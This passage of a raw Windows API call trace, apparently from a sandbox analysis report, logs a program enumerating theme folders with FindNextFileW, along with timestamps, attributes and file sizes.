ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24e4f00, ftCreationTime.dwHighDateTime=0x1c06b0e, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc24e4f00, ftLastWriteTime.dwHighDateTime=0x1c06b0e, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WATER", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WATERMAR", cAlternateFileName="")) returned 1 [0053.924] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WATERMAR", cAlternateFileName="")) returned 0 [0053.924] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0053.925] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.925] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0053.925] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0053.925] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS", cAlternateFileName="")) returned 1 [0053.925] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CANYON", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECHO", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EDGE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICE", cAlternateFileName="")) returned 1 [0053.926] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDUST", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IRIS", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QUAD", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="REFINED", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SATIN", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SKY", cAlternateFileName="")) returned 1 [0053.927] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SLATE", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SONORA", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPRING", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0053.928] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, 